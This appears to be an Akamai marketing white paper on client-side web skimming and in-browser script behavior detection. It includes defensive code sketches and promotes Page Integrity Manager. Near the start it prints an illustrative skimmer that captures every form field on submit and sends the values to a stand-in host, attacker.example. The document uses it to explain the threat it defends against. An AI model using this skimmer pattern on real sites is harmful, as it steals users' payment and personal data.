
Client-Side Protection is Key to Web Application Security

The Open Web Application Security Project (OWASP) Foundation defines cross-site scripting (XSS) attacks as a “type of injection in which malicious scripts are injected into otherwise benign and trusted websites.”1 From the user’s perspective, the malicious code comes from a trusted website. Recently popularized by Magecart hacker groups, script attacks have focused on the web skimming of cookies, tokens, and — most commonly — personally identifiable information (PII) such as payment information, medical records, and other types of sensitive information.

An attacker delivers a malicious script to an unsuspecting user, and it executes on the client side, in the browser. Because the script appears to come from a trusted source, the end user’s browser has no way to know that it should not be trusted and will execute it.
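To make this concrete, here is a minimal, hypothetical sketch of the kind of injected skimmer logic defenders are up against; the attacker domain and the form handling are placeholders for illustration, not code from a real attack:

```typescript
// Illustrative skimmer pattern: once injected into a trusted page, it
// waits for any form submission and copies the field values to an
// attacker-controlled endpoint (placeholder domain).
document.addEventListener("submit", (event) => {
  const form = event.target as HTMLFormElement;
  const stolen: Record<string, string> = {};
  for (const element of Array.from(form.elements)) {
    const input = element as HTMLInputElement;
    if (input.name) stolen[input.name] = input.value;
  }
  // Exfiltration rides alongside the legitimate submission; the user sees nothing.
  navigator.sendBeacon("https://attacker.example/collect", JSON.stringify(stolen));
});
```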

New web skimming attack methodologies, such as Baka and Pipka,2 are wreaking havoc on websites across the globe. Popular third-party scripts, such as Google Analytics, are rapidly (if unwittingly) spreading new web skimming attack vectors. So far in 2020, the cost of breaches that included PII has been 30% higher than that of the average data breach. Specifically, the most expensive breaches per record are PII thefts, at around $150 per breached record globally and $175 per record in the United States.3

The current conventional approach to preventing script attacks relies on threat intelligence and web application firewalls (WAFs) to filter, monitor, and block HTTP traffic to and from a web application using policy controls. While threat intelligence and WAFs are critical parts of any server-side internet security portfolio, they are not enough to protect against recently developed advanced attack methodologies on the client side.

Script attacks are a big deal. Let’s explore why protecting scripts against in-browser attacks requires a different approach.

  1. Browsers have created an increasingly large, hard-to-see attack surface
    Script usage has increased dramatically in the past few years, and scripts built by third parties (not the website owner) have grown in particular. In fact, in a study done by Akamai in early 2020, third-party requests averaged 67% of all requests across all Akamai customers.4 Because third-party scripts aren’t easily visible to or controllable by website owners, it is particularly hard to use threat intelligence and policies to block their malicious activity.
  2. Trusted domains are often the most common source of attacks
    As mentioned in the OWASP definition above, trusted domains are often used as an attack vector for scripts. This is just as surprising to the trusted partner as it is to the website owner. Techniques used to compromise a trusted partner include hijacking existing scripts, exploiting common vulnerabilities, taking advantage of misconfigurations, adding malicious code to open source projects, and hijacking DNS. Since policies typically use allowlists and blocklists to authorize the use of a domain, blocking a trusted domain outright can severely limit the business (see the policy sketch after this list).
  3. Little attention is paid to controlling script vulnerabilities
    Unpatched Common Vulnerabilities and Exposures (CVEs) create gaps in security programs that can act as gateways into websites and their users’ browsers, leading to script attacks if left untreated. Recent studies have estimated that more than 80% of web pages contain at least one known third-party library security CVE.5
  4. Highly dynamic script usage makes timely updates hard
    Scripts power many important web page activities, providing application functions as well as business and website analytics, and they are constantly being added and removed. In a 2020 study, Akamai analyzed more than 100,000 JavaScript resources over a 90-day period. In the final week, only 25% of the scripts were still in use. That’s a 75% turnover within one quarter. Additionally, scripts that persisted throughout the quarter changed very frequently.
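On the allowlist point in item 2: here is a minimal sketch, assuming a Node.js/Express server and a hypothetical analytics.example partner, of why domain-level policy controls (a Content-Security-Policy header, as a common illustration) are all-or-nothing:

```typescript
// Minimal sketch, assuming Node.js/Express: a script-src allowlist can
// only trust or distrust a whole domain. If analytics.example is ever
// compromised, the only policy-level fix is to block it entirely,
// losing the legitimate analytics along with the attack.
import express from "express";

const app = express();

app.use((_req, res, next) => {
  res.setHeader(
    "Content-Security-Policy",
    "script-src 'self' https://analytics.example"
  );
  next();
});

app.listen(3000);
```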

The dynamic nature of attacks, coupled with the dynamic portfolio of scripts, creates many zero-day events that threat intelligence never captures and that blocking policies therefore never cover.

What this all means is that relying solely on threat intelligence and the resulting policies is often too slow, delaying the response to attacks, and in many cases cannot effectively detect abuse in the first place.

What is in-browser script behavior detection?

The purpose of adding malicious web skimming code to script executions is to make a script do something it was not intended to do. This could include sending sensitive information to a bad actor’s destination, or gaining access to different or additional information and then exfiltrating that data to a bad actor’s destination. When this happens, script activities change. That change in script behavior is the most reliable indicator of malicious script impact.
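As a toy illustration of watching behavior rather than reputation, here is a minimal in-page sketch, with the expected-origin list and the reporting endpoint as assumptions, that wraps fetch and flags requests to destinations the page has never used before:

```typescript
// Minimal sketch: wrap window.fetch so every outgoing request's
// destination is checked against the origins the page is expected to
// talk to. A new, unexpected origin is exactly the kind of behavior
// change described above. (Real skimmers also use image beacons,
// sendBeacon, WebSockets, etc., which would need the same treatment.)
const expectedOrigins = new Set([location.origin, "https://analytics.example"]);
const originalFetch = window.fetch.bind(window);

window.fetch = (input: RequestInfo | URL, init?: RequestInit) => {
  const target = typeof input === "string" || input instanceof URL ? input : input.url;
  const url = new URL(target, location.href);
  if (!expectedOrigins.has(url.origin)) {
    // Report the anomaly to a hypothetical telemetry endpoint.
    navigator.sendBeacon("/behavior-report", JSON.stringify({ unexpected: url.origin }));
  }
  return originalFetch(input, init);
};
```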

If the focus of web skimming problems is in-browser script behaviors, what does a security solution look like that deals effectively with this problem?

What are the attributes of effective behavior detection systems?

In-browser script behavior detection

Most web application security solutions today focus on policy enforcement of inbound internet traffic to web servers. 

But these new script attacks focus on scripts executing in web browsers. So data monitoring, collection, and mitigation must be focused on traffic to and from the web browser. Web browser attacks are also called client-side attacks because they happen on the user, or client, side of the internet.


Comprehensive, real-time, real user data collection 

Malicious code can be injected into any script execution at any time. Some skimmers, such as Pipka and Baka, can even delete themselves after running to evade detection.

Critical script activity to collect and analyze (a minimal collection sketch follows the list):

  • Execution events
  • Network activity
  • Document Object Model (DOM) events
  • JavaScript object property accesses
  • Element attributes
  • Cookies and storage access
  • Enrichment data

This data must also be collected for all script types, including first-party, third-party, and other supply chain scripts. This is particularly important because third-party script use is increasing dramatically. Getting visibility into all of these scripts isn’t easy: supply chain scripts, such as third-party scripts, do not flow through the site’s web servers. They interact only at the browser level and are therefore invisible to traditional web server protection methods.

At the same time, web skimming attacks target pages with sensitive information, so an effective web skimming security solution must itself be PCI compliant.

Data that must not be collected:

  • Personally identifiable information (PII)
  • Inner HTML (strings/texts)
  • EU GDPR data
  • Payment data
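A collection layer can enforce these exclusions by recording only metadata about sensitive fields, never their values. A minimal sketch, with the field-name heuristic purely illustrative:

```typescript
// Minimal redaction sketch: before any telemetry leaves the browser,
// drop the values of fields that look sensitive and keep only shape
// metadata (name and length), so PII and payment data are never collected.
const SENSITIVE = /card|cvv|ssn|password|email|account/i; // illustrative heuristic

function sanitizeField(name: string, value: string) {
  if (SENSITIVE.test(name)) {
    // Record that the field was touched, never what it contained.
    return { name, valueLength: value.length, redacted: true as const };
  }
  return { name, value, redacted: false as const };
}

// sanitizeField("card-number", "4111111111111111")
//   -> { name: "card-number", valueLength: 16, redacted: true }
```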

Vulnerability detection

While detecting suspicious and malicious script behaviors is the most important way to stop web skimming attacks, script vulnerabilities also represent weaknesses in protecting customer PII and corporate data. Because an effective web skimming protection system sees all script activity in the browser, it is well placed to continuously compare a frequently updated CVE database against the constantly changing set of scripts a web page uses. Details from a CVE database determine not only which resource is potentially a problem, but why. Rather than just blocking traffic from a source, code tuning or a version upgrade may resolve the issue and allow continued use of a valuable partner.
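A minimal sketch of that comparison, with the version-from-URL heuristic and the feed shape as assumptions (the CVE itself is real: jQuery before 3.4.0 is affected by CVE-2019-11358):

```typescript
// Minimal sketch: map each observed script URL to a library@version key
// and look it up in a CVE index, so the alert can say *why* a script is
// a problem and what upgrade would fix it.
type CveRecord = { id: string; why: string; fixedIn: string };

const cveIndex: Record<string, CveRecord[]> = {
  "jquery@3.3.1": [
    { id: "CVE-2019-11358", why: "prototype pollution in jQuery.extend", fixedIn: "3.4.0" },
  ],
};

function checkScript(url: string): CveRecord[] {
  // Assume versioned filenames like .../jquery-3.3.1.min.js
  const match = url.match(/([a-z.-]+?)[-.](\d+\.\d+\.\d+)(\.min)?\.js$/i);
  if (!match) return [];
  return cveIndex[`${match[1]}@${match[2]}`] ?? [];
}

// checkScript("https://cdn.example/jquery-3.3.1.min.js") reports the CVE
// and that upgrading to 3.4.0, rather than blocking the CDN, resolves it.
```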

Risk-scored information in real time

Website security teams receive a lot of information every day that needs to be analyzed, and script execution information is no different. Many sites generate millions of script actions a day. A valuable web skimming security solution must be able to filter and prioritize this information so that security teams can focus on the situations that might cause data exfiltration. A good way to do this is to provide risk scores that indicate the severity of a change in script behavior. Risk scores rise when a new pattern of change is present, sensitive data is requested, or the source of the script and/or the destination of the data changes. Higher risk scores generate alerts with enough detailed information to make meaningful mitigations. All of this needs to happen in real time, as soon as the analysis flags a change.
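A minimal sketch of that risk-scoring idea, with the weights and threshold purely illustrative:

```typescript
// Minimal sketch: weight the behavioral signals named above and alert
// past a threshold. Weights and threshold are illustrative only.
interface BehaviorChange {
  newPattern: boolean;         // a pattern of change not seen before
  readsSensitiveData: boolean; // e.g., touches payment form fields
  newDestination: boolean;     // data flows to a previously unseen origin
}

function riskScore(change: BehaviorChange): number {
  let score = 0;
  if (change.newPattern) score += 30;
  if (change.readsSensitiveData) score += 40;
  if (change.newDestination) score += 30;
  return score; // 0..100
}

const ALERT_THRESHOLD = 60;
const change = { newPattern: true, readsSensitiveData: true, newDestination: false };
if (riskScore(change) >= ALERT_THRESHOLD) {
  console.warn("High-risk script behavior change; alert the security team");
}
```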

Easy mitigation and policy creation

While known CVEs need policies to block threats, detected suspicious behavior requires analysis. Security teams are always balancing allowing traffic through to maintain the business against blocking activity that harms it, and keeping up can be a heavy resource burden. Good web skimming solutions need to make mitigation quick and easy, with enough detailed information to build a specific policy that lets good business go on. Insights from risk-scored alerts need to be easy to turn into policies with fine granularity, so that only the malicious activity is blocked. This means that some activity from a trusted source may be blocked while the rest is allowed through.
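A minimal sketch of what such a granular rule could look like, with all shapes assumed: it blocks one script-to-destination flow instead of the whole trusted domain.

```typescript
// Minimal sketch: a mitigation rule granular enough to block only the
// malicious behavior (script X sending data to origin Y) while the same
// trusted script's legitimate traffic keeps flowing.
interface PolicyRule {
  scriptUrl: string;     // which script the rule applies to
  blockedOrigin: string; // only this destination is blocked
  reason: string;        // carried over from the risk-scored alert
}

const rules: PolicyRule[] = [
  {
    scriptUrl: "https://analytics.example/tag.js",
    blockedOrigin: "https://attacker.example",
    reason: "risk-scored alert: form data sent to previously unseen origin",
  },
];

function isBlocked(scriptUrl: string, destination: string): boolean {
  const origin = new URL(destination).origin;
  return rules.some((r) => r.scriptUrl === scriptUrl && r.blockedOrigin === origin);
}
```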

Flexible deployment options

Of course, in-browser web skimming attacks are not the only attacks that can have a significant impact on websites. But because the focus is on the web browser rather than web servers, they present a distinct challenge. With that said, a solution still needs to work in concert with other security products and platforms to build a complete web application defense. This means that a good web skimming solution must work independently of technologies like WAFs, bot management, and API gateways, and must be able to support all hosting platforms, CDNs, and cloud solutions.

Akamai has embraced and invested in bringing to market a web skimming protection product called Page Integrity Manager, which focuses on script execution behavior with unprecedented visibility into the runtime environment. It collects information about the different scripts that run in the web page, each action they take, and their relationships to other scripts in the page. Pairing this data with our multilayered detection approach — leveraging heuristics, risk scoring, AI, and other factors — allows Page Integrity Manager to detect different types of client-side attacks, with a strong focus on data exfiltration and web skimming attacks.

 

Sources:

1. https://owasp.org/www-community/attacks/xss/
2. https://www.securityweek.com/visa-issues-alert-baka-javascript-skimmer, 2020
3. https://www.darkreading.com/attacks-breaches/average-cost-of-a-data-breach-$386-million/d/d-id/1338489, 2020
4. HTTP Archive data for sites on the Akamai Intelligent Edge Platform, 2020
5. https://httparchive.org/reports/state-of-the-web#pctVuln, 2020

